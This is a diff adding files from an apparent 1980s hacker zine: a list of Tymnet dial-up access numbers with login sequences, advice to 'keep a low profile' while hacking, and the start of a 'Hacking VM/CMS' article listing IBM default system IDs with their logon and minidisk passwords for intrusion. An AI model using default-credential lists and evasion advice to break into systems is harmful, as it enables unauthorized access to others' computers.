+  06254   HYATTSVILLE           MARYLAND        300/1200  301/779-9935  @PDN
+  06254   LAUREL                MARYLAND        300/2400  301/490-9971  @PDN
+  06254   ROCKVILLE             MARYLAND        300/1200  301/340-9903  @PDN
+  06254   SILVER SPRING         MARYLAND        300/1200  301/495-9911  @PDN
+
+
+  07771   BERNARDSVILLE         NEW JERSEY      300/2400 201/766-7138   @PDN
+  07771   CLINTON               NEW JERSEY      300-1200 201/730-8693   @PDN
+  07771   DOVER                 NEW JERSEY      300/2400 201/361-9211   @PDN
+  07771   EATONTOWN/RED BANK    NEW JERSEY      300/2400 201/758-8000   @PDN
+  07771   ELIZABETH             NEW JERSEY      300/2400 201/289-5100   @PDN
+  07771   ENGLEWOOD             NEW JERSEY      300/2400 201/871-3000   @PDN
+  07771   FREEHOLD              NEW JERSEY      300/2400 201/780-8890   @PDN
+  07771   HACKENSACK            NEW JERSEY      300/2400 201/343-9200   @PDN
+  07771   JERSEY CITY           NEW JERSEY      300/2400 201/659-3800   @PDN
+  07771   LIVINGSTON            NEW JERSEY      300/2400 201/533-0561   @PDN
+  07771   LONG BRANCH/RED BANK  NEW JERSEY      300/2400 201/758-8000   @PDN
+  07771   MADISON               NEW JERSEY      300/2400 201/593-0004   @PDN
+  07771   METUCHEN              NEW JERSEY      300/2400 201/906-9500   @PDN
+  07771   MIDDLETOWN            NEW JERSEY      300/2400 201/957-9000   @PDN
+  07771   MORRISTOWN            NEW JERSEY      300/2400 201/455-0437   @PDN
+  07771   NEWARK                NEW JERSEY      300/2400 201/623-0083   @PDN
+  07771   NEW BRUNSWICK         NEW JERSEY      300/2400 201/247-2700   @PDN
+  07771   NEW FOUNDLAND         NEW JERSEY      300/2400 201/697-9380   @PDN
+  07771   PASSAIC               NEW JERSEY      300/2400 201/473-6200   @PDN
+  07771   PATERSON              NEW JERSEY      300/2400 201/345-7700   @PDN
+  07771   PHILLIPSBURG          NEW JERSEY      300/2400 201/454-9270   @PDN
+  07771   POMPTON LAKES         NEW JERSEY      300/2400 201/835-8400   @PDN
+  07771   RED BANK              NEW JERSEY      300/2400 201/758-8000   @PDN
+  07771   RIDGEWOOD             NEW JERSEY      300/2400 201/445-4800   @PDN
+  07771   SOMERVILLE            NEW JERSEY      300/2400 201/218-1200   @PDN
+  07771   SOUTH RIVER           NEW JERSEY      300/2400 201/390-9100   @PDN
+  07771   SPRING LAKE           NEW JERSEY      300/2400 201/974-0850   @PDN
+  07771   TOMS RIVER            NEW JERSEY      300/2400 201/286-3800   @PDN
+  07771   WASHINGTON            NEW JERSEY      300/2400 201/689-6894   @PDN
+  07771   WAYNE/PATERSON        NEW JERSEY      300/2400 201/345-7700   @PDN
+
+
+  03526   ALLENTOWN             PENNSYLVANIA    300/1200 215/435-0266   @PDN
+  11301   ALTOONA               PENNSYLVANIA    300/1200 814/946-8639   @PDN
+  11301   ALTOONA               PENNSYLVANIA    2400     814/949-0505   @PDN
+  03526   AMBLER                PENNSYLVANIA    300/1200 215/283-2170   @PDN
+  10672   AMBRIDGE              PENNSYLVANIA    300/1200 412/266-9610   @PDN
+  10672   CARNEGIE              PENNSYLVANIA    300/1200 412/276-1882   @PDN
+  10672   CHARLEROI             PENNSYLVANIA    300/1200 412/483-9100   @PDN
+  03526   CHESTER HEIGHTS       PENNSYLVANIA    300/1200 215/358-0820   @PDN
+  03526   COATESVILLE           PENNSYLVANIA    300/1200 215/383-7212   @PDN
+  10672   CONNELLSVILLE         PENNSYLVANIA    300/1200 412/628-7560   @PDN
+  03526   DOWNINGTON/COATES.    PENNSYLVANIA    300/1200 215/383-7212   @PDN
+  03562   DOYLESTOWN            PENNSYLVANIA    300/1200 215/340-0052   @PDN
+  03562   GERMANTOWN            PENNSYLVANIA    300/1200 215-843-4075   @PDN
+  10672   GLENSHAW              PENNSYLVANIA    300/1200 412/487-6868   @PDN
+  10672   GREENSBURG            PENNSYLVANIA    300/1200 412/836-7840   @PDN
+  11301   HARRISBURG            PENNSYLVANIA    300/1200 717/236-3274   @PDN
+  11301   HARRISBURG            PENNSYLVANIA    2400     717/238-0450   @PDN
+  10672   INDIANA               PENNSYLVANIA    300/1200 412/465-7210   @PDN
+  03526   KING OF PRUSSIA       PENNSYLVANIA    300/1200 215/270-2970   @PDN
+  03526   KIRKLYN               PENNSYLVANIA    300/1200 215/789-5650   @PDN
+  03526   LANSDOWNE             PENNSYLVANIA    300/1200 215/626-9001   @PDN
+  10672   LATROBE               PENNSYLVANIA    300/1200 412/537-0340   @PDN
+  11301   LEMOYNE/HARRISBURG    PENNSYLVANIA    300/1200 717/236-3274   @PDN
+  10672   MCKEESPORT            PENNSYLVANIA    300/1200 412/673-6200   @PDN
+  10672   NEW CASTLE            PENNSYLVANIA    300/1200 412/658-5982   @PDN
+  10672   NEW KENSINGTON        PENNSYLVANIA    300/1200 412/337-0510   @PDN
+  03526   NORRISTOWN            PENNSYLVANIA    300/1200 215/270-2970   @PDN
+  03526   PAOLI                 PENNSYLVANIA    300/1200 215/648-0010   @PDN
+  03562   PHILADELPHIA          PENNSYLVANIA    300/1200 215/923-7792   @PDN
+  03562   PHILADELPHIA          PENNSYLVANIA    300/1200 215/557-0659   @PDN
+  03562   PHILADELPHIA          PENNSYLVANIA    300/1200 215/545-7886   @PDN
+  03562   PHILADELPHIA          PENNSYLVANIA    300/1200 215/677-0321   @PDN
+  03562   PHILADELPHIA          PENNSYLVANIA    2400     215/625-0770   @PDN
+  10672   PITTSBURGH            PENNSYLVANIA    300/1200 412/281-8950   @PDN
+  10672   PITTSBURGH            PENNSYLVANIA    300/1200 412-687-4131   @PDN
+  10672   PITTSBURGH            PENNSYLVANIA    2400     412/261-9732   @PDN
+  10672   POTTSTOWN             PENNSYLVANIA    300/1200 215/327-8032   @PDN
+  03526   QUAKERTOWN            PENNSYLVANIA    300/1200 215/538-7032   @PDN
+  03526   READING               PENNSYLVANIA    300/1200 215/375-7570   @PDN
+  10672   ROCHESTER             PENNSYLVANIA    300/1200 412/728-9770   @PDN
+  03526   SCRANTON              PENNSYLVANIA    300/1200 717/348-1123   @PDN
+  03526   SCRANTON              PENNSYLVANIA    2400     717/341-1860   @PDN
+  10672   SHARON                PENNSYLVANIA    300/1200 412/342-1681   @PDN
+  03526   TULLYTOWN             PENNSYLVANIA    300/1200 215/547-3300   @PDN
+  10672   UNIONTOWN             PENNSYLVANIA    300/1200 412/437-5640   @PDN
+  03562   VALLEY FORGE          PENNSYLVANIA    300/1200 215/270-2970   @PDN
+  10672   WASHINGTON            PENNSYLVANIA    300/1200 412/223-9090   @PDN
+  03526   WAYNE                 PENNSYLVANIA    300/1200 215/341-9605   @PDN
+  10672   WILKINSBURG           PENNSYLVANIA    300/1200 412/241-1006   @PDN
+
+
+  06254   ALEXANDRIA            VIRGINIA        300/1200  703/683-6710  @PDN
+  06254   ARLINGTON             VIRGINIA        300/1200  703/524-8961  @PDN
+  06254   FAIRFAX               VIRGINIA        300/1200  703/385-1343  @PDN
+  06254   MCLEAN                VIRGINIA        300/1200  703/848-2941  @PDN
+
+
+    @PDN BELL ATLANTIC - NETWORK NAME IS PUBLIC DATA NETWORK (PDN)
+
+
+             (CONNECT MESSAGE)
+             . _. _. _< _C _R _> _            (SYNCHRONIZES DATA SPEEDS)
+
+             WELCOME TO THE BPA/DST PDN
+
+             *. _T _  _< _C _R _> _           (TYMNET ADDRESS)
+
+
+             131069             (ADDRESS CONFIRMATION - TYMNET DNIC)
+             COM                (CONFIRMATION OF CALL SET-UP)
+
+             -GWY 0XXXX- TYMNET: PLEASE LOG IN:  (HOST # WITHIN DASHES)
+
+
+                                  BELL SOUTH
+
+  NODE    CITY                  STATE           DENSITY  ACCESS NUMBER MODEM
+  -----   --------------------  --------------  ------   ------------  -----
+  10207   ATLANTA               GEORGIA         300/1200 404/261-4633  @PLSK
+  10207   ATHENS                GEORGIA         300/1200 404/354-0614  @PLSK
+  10207   COLUMBUS              GEORGIA         300/1200 404/324-5771  @PLSK
+  10207   ROME                  GEORGIA         300/1200 404/234/7542  @PLSK
+
+
+    @PLSK  BELLSOUTH - NETWORK NAME IS PULSELINK
+
+
+             (CONNECT MESSAGE)
+
+             . _. _. _  _< _C _R _> _           (SYNCHRONIZES DATA SPEEDS)
+                                (DOES NOT ECHO TO THE TERMINAL)
+             CONNECTED
+             PULSELINK
+
+             1 _3 _1 _0 _6 _              (TYMNET ADDRESS)
+                                (DOES NOT ECHO TO THE TERMINAL)
+
+             PULSELINK: CALL CONNECTED TO 1 3106
+
+             -GWY 0XXXX- TYMNET: PLEASE LOG IN:  (HOST # WITHIN DASHES)
+
+
+                                 PACIFIC BELL
+
+  NODE    CITY                  STATE           DENSITY  ACCESS NUMBER  NTWK
+  -----   -------------------   --------------  ------   ------------   ----
+  03306   BERKELEY              CALIFORNIA      300/1200 415-548-2121   @PPS
+  06272   EL SEGUNDO            CALIFORNIA      300/1200 213-640-8548   @PPS
+  06272   FULLERTON             CALIFORNIA      300/1200 714-441-2777   @PPS
+  06272   INGLEWOOD             CALIFORNIA      300/1200 213-216-7667   @PPS
+  06272   LOS ANGELES(DOWNTOWN) CALIFORNIA      300/1200 213-687-3727   @PPS
+  06272   LOS ANGELES           CALIFORNIA      300/1200 213-480-1677   @PPS
+  03306   MOUNTAIN VIEW         CALIFORNIA      300/1200 415-960-3363   @PPS
+  03306   OAKLAND               CALIFORNIA      300/1200 415-893-9889   @PPS
+  03306   PALO ALTO             CALIFORNIA      300/1200 415-325-4666   @PPS
+  06272   PASADENA              CALIFORNIA      300/1200 818-356-0780   @PPS
+  03306   SAN FRANCISCO         CALIFORNIA      300/1200 415-543-8275   @PPS
+  03306   SAN FRANCISCO         CALIFORNIA      300/1200 415-626-5380   @PPS
+  03306   SAN FRANCISCO         CALIFORNIA      300/1200 415-362-2280   @PPS
+  03306   SAN JOSE              CALIFORNIA      300/1200 408-920-0888   @PPS
+  06272   SANTA ANNA            CALIFORNIA      300/1200 714-972-9844   @PPS
+  06272   VAN NUYS              CALIFORNIA      300/1200 818-780-1066   @PPS
+
+
+    @PPS   PACIFIC BELL - NETWORK NAME IS PUBLIC PACKET SWITCHING (PPS)
+
+             (CONNECT MESSAGE)
+
+             . _. _. _< _C _R _             (SYNCHRONIZES DATA SPEEDS)>
+                                (DOES NOT ECHO TO THE TERMINAL)
+
+             ONLINE 1200
+             WELCOME TO PPS:  415-XXX-XXXX
+             1 _3 _1 _0 _6 _9 _             (TYMNET ADDRESS)
+                                (DOES NOT ECHO UNTIL TYMNET RESPONDS)
+
+         -GWY 0XXXX- TYMNET: PLEASE LOG IN:  (HOST # WITHIN DASHES)
+
+                               SOUTHWESTERN BELL
+
+  NODE    CITY                  STATE           DENSITY  ACCESS NUMBERS NWRK
+  -----   --------------------  --------------  -------  ------------   -----
+  05443   KANSAS CITY           KANSAS          300/1200 316/225-9951   @MRLK
+  05443   HAYS                  KANSAS          300/1200 913/625-8100   @MRLK
+  05443   HUTCHINSON            KANSAS          300/1200 316/669-1052   @MRLK
+  05443   LAWRENCE              KANSAS          300/1200 913/841-5580   @MRLK
+  05443   MANHATTAN             KANSAS          300/1200 913/539-9291   @MRLK
+  05443   PARSONS               KANSAS          300/1200 316/421-0620   @MRLK
+  05443   SALINA                KANSAS          300/1200 913/825-4547   @MRLK
+  05443   TOPEKA                KANSAS          300/1200 913/235-1909   @MRLK
+  05443   WICHITA               KANSAS          300/1200 316/269-1996   @MRLK
+
+
+  04766   BRIDGETON/ST. LOUIS   MISSOURI        300/1200 314/622-0900   @MRLK
+  04766   ST. LOUIS             MISSOURI        300/1200 314/622-0900   @MRLK
+
+
+  06510   ADA                   OKLAHOMA        300/1200 405/436-0252   @MRLK
+  06510   ALTUS                 OKLAHOMA        300/1200 405/477-0321   @MRLK
+  06510   ALVA                  OKLAHOMA        300/1200 405/327-1441   @MRLK
+  06510   ARDMORE               OKLAHOMA        300/1200 405/223-8086   @MRLK
+  03167   BARTLESVILLE          OKLAHOMA        300/1200 918/336-6901   @MRLK
+  06510   CLINTON               OKLAHOMA        300/1200 405/323-8102   @MRLK
+  06510   DURANT                OKLAHOMA        300/1200 405/924-2680   @MRLK
+  06510   ENID                  OKLAHOMA        300/1200 405/242-8221   @MRLK
+  06510   LAWTON                OKLAHOMA        300/1200 405/248-8772   @MRLK
+  03167   MCALESTER             OKLAHOMA        300/1200 918/426-0900   @MRLK
+  03167   MIAMI                 OKLAHOMA        300/1200 918/540-1551   @MRLK
+  03167   MUSKOGEE              OKLAHOMA        300/1200 918/683-1114   @MRLK
+  06510   OKLAHOMA CITY         OKLAHOMA        300/1200 405/236-0660   @MRLK
+  06510   PONCA CITY            OKLAHOMA        300/1200 405/762-9926   @MRLK
+  03167   SALLISAW              OKLAHOMA        300/1200 918/775-7713   @MRLK
+  06510   SHAWNEE               OKLAHOMA        300/1200 405/273-0053   @MRLK
+  06510   STILLWATER            OKLAHOMA        300/1200 405/377-5500   @MRLK
+  03167   TULSA                 OKLAHOMA        300/1200 918/583-6606   @MRLK
+  06510   WOODWARD              OKLAHOMA        300/1200 405/256-9947   @MRLK
+
+
+
+
+   @MRLK - SOUTHWESTERN BELL TELEPHONE- NETWORK NAME IS MICROLINK II(R)
+
+             (CONNECT MESSAGE)
+             (PLEASE TYPE YOUR TERMINAL IDENTIFIER)
+
+             A _                  (YOUR TERMINAL IDENTIFIER)
+
+             WELCOME TO MICROLINK II
+             -XXXX:01-030-
+             PLEASE LOG IN:
+             .T < _C _R _> _            (USERNAME TO ACCESS TYMNET)
+
+
+             HOST: CALL CONNECTED
+
+             -GWY 0XXXX- TYMNET: PLEASE LOG IN:
+
+
+                             SOUTHERN NEW ENGLAND
+
+NODE    CITY                  STATE           DENSITY  ACCESS NUMBERS NWRK
+-----   -------------------   -----------     -------  -------------- -----
+02727   BRIDGEPORT            CONNECTICUT     300/2400 203/366-6972   @CONNNET
+02727   BRISTOL               CONNECTICUT     300/2400 203/589-5100   @CONNNET
+02727   CANAAN                CONNECTICUT     300/2400 203/824-5103   @CONNNET
+02727   CLINTON               CONNECTICUT     300/2400 203/669-4243   @CONNNET
+02727   DANBURY               CONNECTICUT     300/2400 203/743-2906   @CONNNET
+02727   DANIELSON             CONNECTICUT     300/2400 203/779-1880   @CONNNET
+02727   HARTFORD/MIDDLETOWN   CONNECTICUT     300/2400 203/724-6219   @CONNNET
+02727   MERIDEN               CONNECTICUT     300/2400 203/237-3460   @CONNNET
+02727   NEW HAVEN             CONNECTICUT     300/2400 203/776-1142   @CONNNET
+02727   NEW LONDON            CONNECTICUT     300/2400 203/443-0884   @CONNNET
+02727   NEW MILFORD           CONNECTICUT     300/2400 203/355-0764   @CONNNET
+02727   NORWALK               CONNECTICUT     300/2400 203/866-5305   @CONNNET
+02727   OLD GREDDWICH         CONNNETICUT     300/2400 203/637-8872   @CONNNET
+02727   OLD SAYBROOK          CONNECTICUT     300/2400 203/388-0778   @CONNNET
+02727   SEYMOUR               CONNECTICUT     300/2400 203/881-1455   @CONNNET
+02727   STAMFORD              CONNECTICUT     300/2400 203/324-9701   @CONNNET
+02727   STORRS                CONNECTICUT     300/2400 203/429-4243   @CONNNET
+02727   TORRINGTON            CONNECTICUT     300/2400 203/482-9849   @CONNNET
+02727   WATERBURY             CONNECTICUT     300/2400 203/597-0064   @CONNNET
+02727   WILLIMANTIC           CONNECTICUT     300/2400 203/456-4552   @CONNNET
+02727   WINDSOR               CONNECTICUT     300/2400 203/688-9330   @CONNNET
+02727   WINDSOR LCKS/ENFIELD  CONNECTICUT     300/2400 203/623-9804   @CONNNET
+
+
+
+    @CONNNET - SOUTHERN NEW ENGLAND TELEPHONE - NETWORK NAME IN CONNNET
+
+     (CONNECT MESSAGE)
+
+      H_ H_ <_ C_ R_>        (SYNCHRONIZES DATA SPEEDS)
+                        (DOES NOT ECHO TO THE TERMINAL)
+      CONNNET
+
+     ._ T_ <_ C_ R_>_         (MUST BE CAPITAL LETTERS)
+
+      26-SEP-88   18:33          (DATA)
+      031069                     (ADDRESS CONFIRMATION)
+      COM                        (CONFIRMATION OF CALL SET-UP)
+
+      -GWY OXXXX-TYMNET: PLEASE LOG IN:
+
+On a side note, the recent book The Cuckoo's Egg provides some interesting
+information (in the form of a story, however) on a Tymnet hacker.  Remember
+that he was into BIG things, and hence he was cracked down upon.  If you keep a
+low profile, networks should provide a good access method.
+
+If you can find a system that is connected to the Internet that you can get on
+from Tymnet, you are doing well.
+_______________________________________________________________________________
diff --git a/phrack30/4.txt b/phrack30/4.txt
new file mode 100644
index 0000000..7da398c
--- /dev/null
+++ b/phrack30/4.txt
@@ -0,0 +1,1679 @@
+                                ==Phrack Inc.==
+
+                     Volume Three, Issue 30, File #4 of 12
+
+
+                     /===================================\
+                     |                                   |
+                     |          Hacking VM/CMS           |
+                     |                                   |
+                     |                                   |
+                     |              by Goe               |
+                     |                                   |
+                     \===================================/
+
+
+This file written by Goe (my nickname).  Any comments or criticisms or
+corrections are welcomed.  Anyone with a good knowledge can modify this.
+
+The article's topic is the IBM VM/SP running CMS and using DIRMAINT.  I do not
+know if it works in MVS/TSO or VSE.
+
+The first table contains the original default IDs & passwords from IBM Corp.
+
+The second table contains those default IDs & passwords that IBM customized for
+its customer.
+
+===============================================================================
+
+***************************************************************
+*  3380      SYSTEM DIRECTORY                                 *
+***************************************************************
+*                                                             *
+*      The addresses 123, 124, and 125 are virtual ad-        *
+*      dresses.  The address 123 is critical since it is      *
+*      used in DMKSYS, the directory, and the service en-     *
+*      vironments of the Interactive Productivity Facil-      *
+*      ity.  Do not change this address.  If you still want   *
+*      to change it, remember it must be changed in           *
+*      DMKSYS, all service environments, the 'DIRECTORY'      *
+*      statement below, and in the 'MDISK' statements         *
+*      found under the userid  'MAINT'.                       *
+*                                                             *
+*      NOTE:  Remember these are only virtual addresses       *
+*      not real addresses, so there is no need to change      *
+*      them to match your hardware addresses.  More in-       *
+*      formation is contained in the system Installation      *
+*      Guide.                                                 *
+*                                                             *
+***************************************************************
+*
+DIRECTORY 123  3380  VMSRES
+*
+***************************************************************
+*      3380  SYSTEM RESERVED AREAS (NOT FOR MINIDISKS)        *
+***************************************************************
+*
+USER $ALLOC$  NOLOG
+ MDISK A01 3380 000 001 VMSRES R
+ MDISK B01 3380 000 001 VMPK01 R
+ MDISK E01 3380 000 001 VMPK04 R
+ MDISK F11 3380 000 001 PROFPK R
+ MDISK F21 3380 000 001 SQLPK  R
+*
+USER $TEMP$   NOLOG
+ MDISK A09 3380 272 228 VMSRES R
+ MDISK D09 3380 277 258 VMPK01
+*
+USER $TDISK$ NOLOG
+ MDISK A08 3380 585 091 VMSRES R
+*
+USER $CPNUC$ NOLOG
+ MDISK A02 3380 001 005 VMSRES R
+*
+USER $DIRECT$ NOLOG
+ MDISK A03 3380 500 002 VMSRES R
+*
+USER $SAVSYS$ NOLOG
+ MDISK A04 3380 006 011 VMSRES R
+ MDISK B04 3380 012 056 VMPK01 R
+*
+USER $SYSERR$ NOLOG
+ MDISK A06 3380 019 002 VMSRES R
+*
+USER $SYSCKP$ NOLOG
+ MDISK A05 3380 271 001 VMSRES R
+*
+USER $SYSWRM$ NOLOG
+ MDISK A07 3380 017 002 VMSRES R
+*
+***************************************************************
+*             SYSTEM RELATED USERIDS                          *
+***************************************************************
+*
+USER AUTOLOG1 NOLOG 512K 1M ABCDEG
+ ACCOUNT 2 SYSTEM
+ IPL CMS PARM AUTOCR
+ CONSOLE 009 3215
+ SPOOL 00C 2540 READER *
+ SPOOL 00D 2540 PUNCH  A
+ SPOOL 00E 1403 A
+ LINK MAINT 190 190 RR
+ LINK MAINT 19D 19D RR
+ LINK MAINT 19E 19E RR
+ MDISK 191 3380 093 001 VMPK01 MR RAUTOLOG WAUTOLOG MAUTOLOG
+*
+USER CMSBATCH NOLOG 1M 2M G
+ ACCOUNT 3 SYSTEM
+ OPTION ACCT
+ IPL CMS PARM AUTOCR
+ CONSOLE 009 3215
+ SPOOL 00C 2540 READER *
+ SPOOL 00D 2540 PUNCH  A
+ SPOOL 00E 1403 A
+ LINK MAINT 190 190 RR
+ MDISK 195 3380 068 002 VMPK01 MR RBATCH   WBATCH   MBATCH
+*
+USER CMSUSER NOLOG 1M 3M G
+ ACCOUNT 101 USER01
+ IPL CMS
+ CONSOLE 009 3215
+ SPOOL 00C 2540 READER *
+ SPOOL 00D 2540 PUNCH  A
+ SPOOL 00E 1403 A
+ LINK MAINT 190 190 RR
+ LINK MAINT 19D 19D RR
+ LINK MAINT 19E 19E RR
+ MDISK 191 3380 089 003 VMPK01 MR RCMS     WCMS     MCMS
+*
+USER EREP NOLOG 768K 2M FG
+ ACCOUNT EREP IBMCE
+ IPL CMS
+ CONSOLE 01F 3215
+ SPOOL 00C 2540 READER *
+ SPOOL 00D 2540 PUNCH A
+ SPOOL 00E 1403 A
+ LINK MAINT 190 190 RR
+ LINK MAINT 19D 19D RR
+ LINK MAINT 19E 19E RR
+ LINK MAINT 201 192 RR
+ MDISK 191 3380 027 001 VMSRES WR READ     WRITE
+*
+USER GCS  NOLOG  5M 6M  G
+ ACCOUNT GCS RECVM
+ OPTION ECMODE DIAG98
+ IPL GCS PARM AUTOLOG
+ CONSOLE 009 3215
+ SPOOL 00C 2540 READER *
+ SPOOL 00D 2540 PUNCH  A
+ SPOOL 00E 1403 A
+ LINK MAINT 190 190 RR
+ LINK MAINT 19D 19D RR
+ LINK MAINT 595 595 RR
+ LINK MAINT 59E 59E RR
+ MDISK 191 3380 677 005 VMPK01 MR RGCS     WGCS     MGCS
+*
+USER IVPM1 NOLOG 3M   16M G
+ ACCOUNT ACT4 IVPM1
+ CONSOLE 009 3210
+ SPOOL 00C 2540 READER *
+ SPOOL 00D 2540 PUNCH A
+ SPOOL 00E 1403 A
+ LINK MAINT 190 190 RR
+ LINK MAINT 193 193 RR
+ LINK MAINT 194 194 RR
+ LINK MAINT 19D 19D RR
+ MDISK 191 3380 883 001 VMSRES WR READ     WRITE
+*
+USER IVPM2 NOLOG  3M   4M G
+ ACCOUNT ACT5 IVPM2
+ CONSOLE 009 3210
+ SPOOL 00C 2540 READER *
+ SPOOL 00D 2540 PUNCH A
+ SPOOL 00E 1403 A
+ LINK MAINT 190 190 RR
+ LINK MAINT 193 193 RR
+ LINK MAINT 194 194 RR
+ LINK MAINT 19D 19D RR
+ MDISK 191 3380 884 001 VMSRES WR READ     WRITE
+*
+USER MAINT CPCMS 16M 16M ABCDEFG
+ ACCOUNT 1 SYSPROG
+ OPTION ECMODE DIAG98
+ IPL 190
+ CONSOLE 009 3215
+ SPOOL 00C 2540 READER *
+ SPOOL 00D 2540 PUNCH  A
+ SPOOL 00E 1403 A
+ MDISK 123 3380 000 885 VMSRES MW RSYSRES  WSYSRES  MSYSRES
+ MDISK 124 3380 000 885 VMPK01 MW RSYSRES  WSYSRES  MSYSRES
+ MDISK 127 3380 000 885 VMPK04 MW RSYSRES  WSYSRES  MSYSRES
+ MDISK 129 3380 000 885 PROFPK MW RSYSRES  WSYSRES  MSYSRES
+ MDISK 130 3380 000 885 SQLPK  MW RSYSRES  WSYSRES  MSYSRES
+ MDISK 19D 3380 229 048 VMPK01 MW ALL      WMAINT   MMAINT
+ MDISK 190 3380 502 037 VMSRES MW ALL      WMAINT   MMAINT
+ MDISK 191 3380 144 010 VMSRES MW RMAINT   WMAINT   MMAINT
+ MDISK 193 3380 117 027 VMSRES MW RMAINT   WMAINT   MMAINT
+ MDISK 194 3380 044 027 VMSRES MW RMAINT   WMAINT   MMAINT
+ MDISK 196 3380 028 016 VMSRES MW RMAINT   WMAINT   MMAINT
+ MDISK 201 3380 767 023 VMSRES MW RMAINT   WMAINT   MMAINT
+ MDISK 293 3380 790 027 VMSRES MW RCMSAUX  WCMSAUX  MCMSAUX
+ MDISK 294 3380 862 021 VMSRES MW RCPAUX   WCPAUX   MCPAUX
+ MDISK 295 3380 211 014 VMSRES MW RUSRMOD  WUSRMOD  MUSRMOD
+ MDISK 296 3380 070 019 VMPK01 MW RCPAUX   WCPAUX   MCPAUX
+ MDISK 319 3380 021 006 VMSRES MW ALL      WMAINT   MMAINT
+ MDISK 393 3380 353 063 VMPK04 WR RMAINT   WMAINT
+ MDISK 394 3380 416 076 VMPK04 WR RMAINT   WMAINT
+ MDISK 396 3380 499 034 VMPK04 WR RMAINT   WMAINT
+ MDISK 492 3380 664 011 VMPK01 MW RTSFOBJ  WTSFOBJ  MTSFOBJ
+ MDISK 494 3380 864 011 VMPK01 MW RTSFAUX  WTSFAUX  MTSFAUX
+ MDISK 496 3380 092 001 VMPK01 MW RIPCX    WIPCSX   MIPSX
+ MDISK 497 3380 492 007 VMPK04 MW RMAINT   WMAINT
+ MDISK 59E 3380 875 010 VMPK01 MW ALL      WMAINT   MMAINT
+ MDISK 595 3380 682 031 VMPK01 MW RMAINT   WMAINT   MMAINT
+ MDISK 596 3380 713 021 VMPK01 MW RGCSAUX  WGCSAUX  MGCSAUX
+*
+USER OLTSEP NOLOG 1M 1M FG
+ ACCOUNT OLTSEP IBMCE
+ OPTION REALTIMER ECMODE
+ IPL 5FF
+ CONSOLE 01F 3215
+ SPOOL 00C 2540 READER *
+ SPOOL 00D 2540 PUNCH A
+ SPOOL 00E 1403 A
+ LINK MAINT 19D 19D RR
+ MDISK 5FF 3380 000 885 CEPACK MR READ     WRITE
+*
+USER OPERATNS NOLOG 1M  2M BCEG
+ ACCOUNT 13 SYSPROG
+ IPL CMS
+ CONSOLE 009 3215
+ SPOOL 00C 2540 READER *
+ SPOOL 00D 2540 PUNCH  A
+ SPOOL 00E 1403 A
+ LINK MAINT 190 190 RR
+ LINK MAINT 19D 19D RR
+ LINK MAINT 19E 19E RR
+ MDISK 191 3380 154 001 VMSRES MR RIPCS    WIPCS    MIPCS
+ MDISK 193 3380 201 008 VMSRES MR RIPCS    WIPCS    MIPCS
+*
+USER OPERATOR OPERATOR  3M 16M ABCDEFG
+ ACCOUNT 2 OPERATOR
+ CONSOLE 009 3215 T MAINT
+ SPOOL 00C 2540 READER *
+ SPOOL 00D 2540 PUNCH  A
+ SPOOL 00E 1403 A
+ LINK MAINT 190 190 RR
+ LINK MAINT 19D 19D RR
+ LINK MAINT 19E 19E RR
+ MDISK 191 3380 209 002 VMSRES MR ROPER    WOPER    MOPER
+*
+USER SYSDUMP1 NOLOG 1M 1M BG
+ ACCOUNT 16 SYSTEM
+ IPL CMS
+ CONSOLE 009 3215
+ SPOOL 00C 2540 READER *
+ SPOOL 00D 2540 PUNCH A
+ SPOOL 00E 1403 A
+ LINK MAINT 190 190 RR
+ LINK MAINT 19D 19D RR
+ LINK MAINT 19E 19E RR
+ MDISK 123 3380 000 885 VMSRES RR
+ MDISK 124 3380 000 885 VMPK01 RR
+ MDISK 127 3380 000 885 VMPK04 RR
+ MDISK 129 3380 000 885 PROFPK RR
+ MDISK 130 3380 000 885 SQLPK  RR
+*
+USER TSAFVM NOLOG 4M 8M G
+ ACCOUNT 1 xxxxxx
+ OPTION MAXCONN 256 BMX ECMODE COMSRV ACCT CONCEAL REALTIMER
+ IUCV ALLOW
+ IUCV *CRM
+ IPL CMS PARM AUTOCR
+ CONSOLE 009 3215 A OPERATOR
+ SPOOL 00C 2540 READER *
+ SPOOL 00D 2540 PUNCH A
+ SPOOL 00E 1403 A
+ LINK MAINT 190 190 RR
+ LINK MAINT 19D 19D RR
+ LINK MAINT 19E 19E RR
+ LINK MAINT 492 192 RR
+ LINK MAINT 494 494 RR
+ MDISK 191 3380 675 002 VMPK01 MR
+DEDICATE 300 4A0
+*
+
+===============================================================================
+
+***************************************************************
+*  3380      SYSTEM DIRECTORY                                 *
+***************************************************************
+*                                                             *
+*      The virtual address 123 is critical since it is        *
+*      used in DMKSYS, the directory, and the service en-     *
+*      vironments of the Interactive Productivity Facil-      *
+*      ity.  Do not change this address.  If you still want   *
+*      to change it, remember it must be changed in           *
+*      DMKSYS, all service environments, the 'DIRECTORY'      *
+*      statement below, and in the 'MDISK' statements         *
+*      found under the userid  'MAINT'.                       *
+*                                                             *
+*      NOTE:  Remember these are only virtual addresses       *
+*      not real addresses, so there is no need to change      *
+*      them to match your hardware addresses.  More in-       *
+*      formation is contained in the system Installation      *
+*      Guide.                                                 *
+*                                                             *
+***************************************************************
+*
+DIRECTORY 123 3380 VMSRES
+*
+***************************************************************
+*    EXPRESS STANDARD PROFILE FOR GENERAL PURPOSE USERIDS     *
+***************************************************************
+*
+PROFILE EXPPROF
+ IPL CMS PARM AUTOCR
+ CONSOLE 009 3215
+ SPOOL 00C 2540 READER *
+ SPOOL 00D 2540 PUNCH  A
+ SPOOL 00E 1403 A
+ LINK MAINT 190 190 RR
+ LINK MAINT 19D 19D RR
+ LINK MAINT 19E 19E RR
+*
+***************************************************************
+*      3380  SYSTEM RESERVED AREAS (NOT FOR MINIDISKS)        *
+***************************************************************
+*
+USER $ALLOC$  NOLOG
+ MDISK A01 3380 000 001 VMSRES R                                       03131808
+ MDISK A02 3380 000 001 VMGCS1 R                                       03131808
+ MDISK A05 3380 000 001 VMPK01 R                                       03131808
+ MDISK A06 3380 000 001 VMSTGE R                                       03131808
+ MDISK A07 3380 000 001 PROFPK R                                       03131808
+ MDISK A08 3380 000 001 SQLPK  R                                       03131808
+ MDISK A09 3380 000 001 VMPK02 R                                       03131808
+ MDISK A0A 3380 000 001 EDMD01 R                                       03131808
+*
+USER $TEMP$   NOLOG
+ MDISK B01 3380 392 100 VMSRES R                                       03131808
+ MDISK B02 3380 392 100 VMPK01 R                                       03131808
+*
+USER $TDISK$ NOLOG
+ MDISK C01 3380 358 033 VMSRES R                                       03131808
+ MDISK C02 3380 492 022 VMPK01 R                                       03131808
+*
+USER $CPNUC$ NOLOG
